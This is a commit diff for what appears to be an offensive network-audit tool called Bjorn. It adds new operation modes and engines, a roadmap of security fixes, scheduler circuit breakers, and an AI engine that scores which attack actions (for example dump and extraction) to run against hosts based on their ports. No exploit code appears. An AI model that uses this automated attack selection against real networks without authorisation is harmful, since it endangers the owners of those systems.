Add Loki and Sentinel utility classes for web API endpoints

- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
This commit is contained in:
infinition
2026-03-14 22:33:10 +01:00
parent eb20b168a6
commit aac77a3e76
525 changed files with 29400 additions and 13136 deletions

View File

@@ -235,8 +235,10 @@ class Bjorn:
backoff_s = 1.0
while not self.shared_data.should_exit:
try:
# Manual mode must stop orchestration so the user keeps full control.
if self.shared_data.operation_mode == "MANUAL":
# Manual/Bifrost mode must stop orchestration.
# BIFROST: WiFi is in monitor mode, no network available for scans.
current_mode = self.shared_data.operation_mode
if current_mode in ("MANUAL", "BIFROST", "LOKI"):
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
@@ -257,7 +259,7 @@ class Bjorn:
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
if self.shared_data.operation_mode == "MANUAL":
if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
return
if self.is_network_connected():
self.wifi_connected = True
@@ -300,9 +302,14 @@ class Bjorn:
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration.
# Keep MANUAL sticky so supervisor does not auto-restart orchestration,
# but only if the current mode isn't already handling it.
# - MANUAL/BIFROST: already non-AUTO, no need to change
# - AUTO: let it be — orchestrator will restart naturally (e.g. after Bifrost auto-disable)
try:
self.shared_data.operation_mode = "MANUAL"
current = self.shared_data.operation_mode
if current == "AI":
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
@@ -320,12 +327,19 @@ class Bjorn:
key="orch_stop_not_graceful",
interval_s=20,
)
return
# Still reset status so UI doesn't stay stuck on the
# last action while the thread finishes in the background.
else:
self.orchestrator_thread = None
self.orchestrator = None
self.orchestrator_thread = None
self.orchestrator = None
# Always reset display state regardless of whether join succeeded.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
@@ -441,6 +455,22 @@ def handle_exit(
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
@@ -517,6 +547,45 @@ if __name__ == "__main__":
health_thread = HealthMonitor(shared_data, interval_s=health_interval)
health_thread.start()
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,

315
ROADMAP.md Normal file
View File

@@ -0,0 +1,315 @@
# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners: replaced raw `addEventListener` with `tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
- `ai_auto_rollback_window` (50) — decisions before auto-rollback evaluation
- `ai_cold_start_bootstrap_weight` (0.6) — bootstrap vs static heuristic weight
- `circuit_breaker_threshold` (3) — consecutive failures to open circuit
- `manual_mode_auto_scan` (true) — auto-scan in MANUAL mode
- `manual_mode_scan_interval` (180) — seconds between manual mode scans

View File

@@ -974,6 +974,32 @@ class ActionScheduler:
"""
self_port = 0 if target_port is None else int(target_port)
# Circuit breaker check (ORCH-01)
if self.db.is_circuit_open(action_name, mac):
logger.debug(f"Circuit breaker open for {action_name}/{mac}, skipping")
return False
# Global concurrency limit check (ORCH-02)
running_count = self.db.count_running_actions()
max_concurrent = int(getattr(self.shared_data, 'semaphore_slots', 5))
if running_count >= max_concurrent:
logger.debug(f"Concurrency limit reached ({running_count}/{max_concurrent}), skipping {action_name}")
return False
# Per-action concurrency limit (ORCH-02)
requires_raw = action_def.get("b_requires", "")
if requires_raw:
try:
req_obj = json.loads(requires_raw) if isinstance(requires_raw, str) else requires_raw
if isinstance(req_obj, dict) and "max_concurrent" in req_obj:
max_per_action = int(req_obj["max_concurrent"])
running_for_action = self.db.count_running_actions(action_name=action_name)
if running_for_action >= max_per_action:
logger.debug(f"Per-action concurrency limit for {action_name} ({running_for_action}/{max_per_action})")
return False
except (json.JSONDecodeError, TypeError, ValueError):
pass
# 0) Duplicate protection (active)
existing = self.db.query(
"""

View File

@@ -60,6 +60,24 @@ class BjornAIEngine:
self.last_server_attempted = False
self.last_server_contact_ok = None
# AI-03: Model versioning & rollback
self._previous_model = None # {weights, config, feature_config}
self._model_history = [] # [{version, loaded_at, accuracy, avg_reward}]
self._max_model_versions_on_disk = 3
self._performance_window = [] # recent reward values for current model
self._performance_check_interval = int(
getattr(shared_data, 'ai_model_perf_check_interval', 50)
)
self._prev_model_avg_reward = None # avg reward of the model we replaced
# AI-04: Cold-start bootstrap scores
self._bootstrap_scores = {} # {(action_name, port_profile): [total_reward, count]}
self._bootstrap_file = self.model_dir / 'ai_bootstrap_scores.json'
self._bootstrap_weight = float(
getattr(shared_data, 'ai_cold_start_bootstrap_weight', 0.6)
)
self._load_bootstrap_scores()
# Try to load latest model
self._load_latest_model()
@@ -105,7 +123,8 @@ class BjornAIEngine:
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
valid_models = sorted(valid_models)
latest_model = valid_models[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
@@ -113,28 +132,80 @@ class BjornAIEngine:
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
new_config = model_data.get('config', model_data)
new_feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
new_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
# AI-03: Save previous model for rollback
if self.model_loaded and self.model_weights is not None:
self._previous_model = {
'weights': self.model_weights,
'config': self.model_config,
'feature_config': self.feature_config,
}
# Record avg reward of outgoing model for performance comparison
if self._performance_window:
self._prev_model_avg_reward = (
sum(self._performance_window) / len(self._performance_window)
)
self._performance_window = [] # reset for new model
self.model_config = new_config
self.feature_config = new_feature_config
self.model_weights = new_weights
self.model_loaded = True
# AI-03: Track model history
from datetime import datetime as _dt
version = self.model_config.get('version', 'unknown')
self._model_history.append({
'version': version,
'loaded_at': _dt.now().isoformat(),
'accuracy': self.model_config.get('accuracy'),
'avg_reward': None, # filled later as decisions accumulate
})
# Keep history bounded
if len(self._model_history) > 10:
self._model_history = self._model_history[-10:]
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
f"Model loaded successfully: {version}"
)
# AI-03: Prune old model versions on disk (keep N most recent)
self._prune_old_model_files(valid_models)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def _prune_old_model_files(self, valid_models: list):
    """AI-03: Delete all but the N most recent model files on disk.

    ``valid_models`` is expected sorted oldest-to-newest; the last
    ``self._max_model_versions_on_disk`` entries are kept. Each config
    file has a sibling ``*_weights.json`` removed alongside it. Pruning
    is strictly best-effort: failures are logged at debug level only.
    """
    try:
        limit = self._max_model_versions_on_disk
        stale = valid_models[:-limit] if len(valid_models) > limit else []
        for config_path in stale:
            weights_path = config_path.with_name(config_path.stem + '_weights.json')
            try:
                config_path.unlink(missing_ok=True)
                weights_path.unlink(missing_ok=True)
                logger.info(f"Pruned old model: {config_path.name}")
            except Exception as e:
                logger.debug(f"Could not prune {config_path.name}: {e}")
    except Exception as e:
        logger.debug(f"Model pruning error: {e}")
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
@@ -146,6 +217,100 @@ class BjornAIEngine:
self._load_latest_model()
return self.model_loaded
def rollback_model(self) -> bool:
    """
    AI-03: Swap the active model with the previously loaded version.

    The outgoing model is stashed as the new "previous" entry, so a
    second call undoes the rollback. The performance window is cleared
    and a ``*_rollback`` entry is appended to the model history.
    Returns True on success, False when no previous model is stored.
    """
    if self._previous_model is None:
        logger.warning("No previous model available for rollback")
        return False
    logger.info("Rolling back to previous model version...")
    # Stash the active model so the rollback itself can be reverted.
    outgoing = None
    if self.model_loaded and self.model_weights is not None:
        outgoing = {
            'weights': self.model_weights,
            'config': self.model_config,
            'feature_config': self.feature_config,
        }
    restored = self._previous_model
    self.model_weights = restored['weights']
    self.model_config = restored['config']
    self.feature_config = restored['feature_config']
    self.model_loaded = True
    self._previous_model = outgoing
    self._performance_window = []  # fresh window for the restored model
    version = self.model_config.get('version', 'unknown')
    from datetime import datetime as _dt
    self._model_history.append({
        'version': f"{version}_rollback",
        'loaded_at': _dt.now().isoformat(),
        'accuracy': self.model_config.get('accuracy'),
        'avg_reward': None,
    })
    logger.success(f"Rolled back to model version: {version}")
    return True
def record_reward(self, reward: float):
    """
    AI-03: Track per-decision rewards and auto-rollback on degradation.

    Each reward is appended to the performance window and the running
    average is mirrored into the latest model-history entry. Once the
    window reaches the configured check interval, its mean is compared
    against the previous model's mean reward; a drop (with a previous
    model available) triggers rollback_model(). The window is cleared
    after every check cycle.
    """
    self._performance_window.append(reward)
    window = self._performance_window
    # Keep the live average visible in the model history entry.
    if self._model_history:
        self._model_history[-1]['avg_reward'] = round(sum(window) / len(window), 2)
    # Not enough samples yet for a performance verdict.
    if len(window) < self._performance_check_interval:
        return
    current_avg = sum(window) / len(window)
    degraded = (
        self._prev_model_avg_reward is not None
        and current_avg < self._prev_model_avg_reward
        and self._previous_model is not None
    )
    if degraded:
        logger.warning(
            f"Model performance degraded: current avg={current_avg:.2f} vs "
            f"previous avg={self._prev_model_avg_reward:.2f}. Auto-rolling back."
        )
        self.rollback_model()
    else:
        logger.info(
            f"Model performance check passed: avg_reward={current_avg:.2f} "
            f"over {len(self._performance_window)} decisions"
        )
    # Start a fresh window for the next evaluation cycle.
    self._performance_window = []
def get_model_info(self) -> Dict[str, Any]:
    """AI-03: Snapshot of model version, load state, history and perf stats."""
    window = self._performance_window
    running_avg = round(sum(window) / len(window), 2) if window else None
    return {
        'current_version': self.model_config.get('version') if self.model_config else None,
        'model_loaded': self.model_loaded,
        'has_previous_model': self._previous_model is not None,
        # Copy so callers cannot mutate our internal history list.
        'history': list(self._model_history),
        'performance': {
            'current_avg_reward': running_avg,
            'decisions_since_load': len(window),
            'check_interval': self._performance_check_interval,
            'previous_model_avg_reward': self._prev_model_avg_reward,
        },
    }
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
@@ -596,6 +761,58 @@ class BjornAIEngine:
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# AI-04: COLD-START BOOTSTRAP
# ═══════════════════════════════════════════════════════════════════════
def _load_bootstrap_scores(self):
    """Restore bootstrap averages persisted by _save_bootstrap_scores.

    On-disk format: {"action|profile": [total_reward, count], ...}.
    Malformed entries are silently skipped; any I/O or parse error is
    logged at debug level and otherwise ignored (cold start proceeds
    with an empty score table).
    """
    try:
        if not self._bootstrap_file.exists():
            return
        with open(self._bootstrap_file, 'r') as f:
            raw = json.load(f)
        for key_str, val in raw.items():
            action, sep, profile = key_str.partition('|')
            # Only accept well-formed "action|profile" -> [total, count] pairs.
            if sep and isinstance(val, list) and len(val) == 2:
                self._bootstrap_scores[(action, profile)] = val
        logger.info(f"Loaded {len(self._bootstrap_scores)} bootstrap score entries")
    except Exception as e:
        logger.debug(f"Could not load bootstrap scores: {e}")
def _save_bootstrap_scores(self):
    """Persist bootstrap scores as {"action|profile": [total, count]} JSON.

    Best-effort: write failures are logged at debug level and swallowed.
    """
    try:
        flat = {
            f"{action}|{profile}": v
            for (action, profile), v in self._bootstrap_scores.items()
        }
        with open(self._bootstrap_file, 'w', encoding='utf-8') as f:
            json.dump(flat, f)
    except Exception as e:
        logger.debug(f"Could not save bootstrap scores: {e}")
def update_bootstrap(self, action_name: str, port_profile: str, reward: float):
    """
    AI-04: Fold one execution reward into the (action, port_profile) average.

    Scores are kept as ``[total_reward, count]`` per key. Persistence is
    throttled: the table is flushed to disk only when the global update
    count lands on a multiple of 5, to limit disk writes.
    """
    key = (action_name, port_profile)
    entry = self._bootstrap_scores.setdefault(key, [0.0, 0])
    entry[0] += reward
    entry[1] += 1
    # Throttled best-effort persistence (every 5th update overall).
    total_updates = sum(cnt for _, cnt in self._bootstrap_scores.values())
    if total_updates % 5 == 0:
        self._save_bootstrap_scores()
    logger.debug(
        f"Bootstrap updated: {action_name}+{port_profile} "
        f"avg={entry[0]/entry[1]:.1f} (n={entry[1]})"
    )
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
# ═══════════════════════════════════════════════════════════════════════
@@ -641,7 +858,7 @@ class BjornAIEngine:
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
AI-04: Blends static rules with bootstrap scores from actual execution data.
"""
try:
mac = host_context.get('mac', '')
@@ -655,30 +872,60 @@ class BjornAIEngine:
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Static heuristic scoring
static_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
if action in static_scores:
static_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
if action in static_scores:
static_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
if action in static_scores:
static_scores[action] += 0.3
# AI-04: Blend static scores with bootstrap scores
blended_scores = {}
bootstrap_used = False
for action in available_actions:
static_score = static_scores.get(action, 0.0)
key = (action, port_profile)
entry = self._bootstrap_scores.get(key)
if entry and entry[1] > 0:
bootstrap_used = True
bootstrap_avg = entry[0] / entry[1]
# Normalize bootstrap avg to 0-1 range (assume reward range ~-30 to +200)
bootstrap_norm = max(0.0, min(1.0, (bootstrap_avg + 30) / 230))
sample_count = entry[1]
# Lerp bootstrap weight from 40% to 80% over 20 samples
base_weight = self._bootstrap_weight # default 0.6
if sample_count < 20:
# Interpolate: at 1 sample -> 0.4, at 20 samples -> 0.8
t = (sample_count - 1) / 19.0
bootstrap_w = 0.4 + t * (0.8 - 0.4)
else:
bootstrap_w = 0.8
static_w = 1.0 - bootstrap_w
blended_scores[action] = static_w * static_score + bootstrap_w * bootstrap_norm
else:
blended_scores[action] = static_score
# Find best action
action_scores = blended_scores
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
@@ -688,11 +935,12 @@ class BjornAIEngine:
best_score = min(best_score / 1.0, 1.0)
debug_info = {
'method': 'heuristics',
'method': 'heuristics_bootstrap' if bootstrap_used else 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
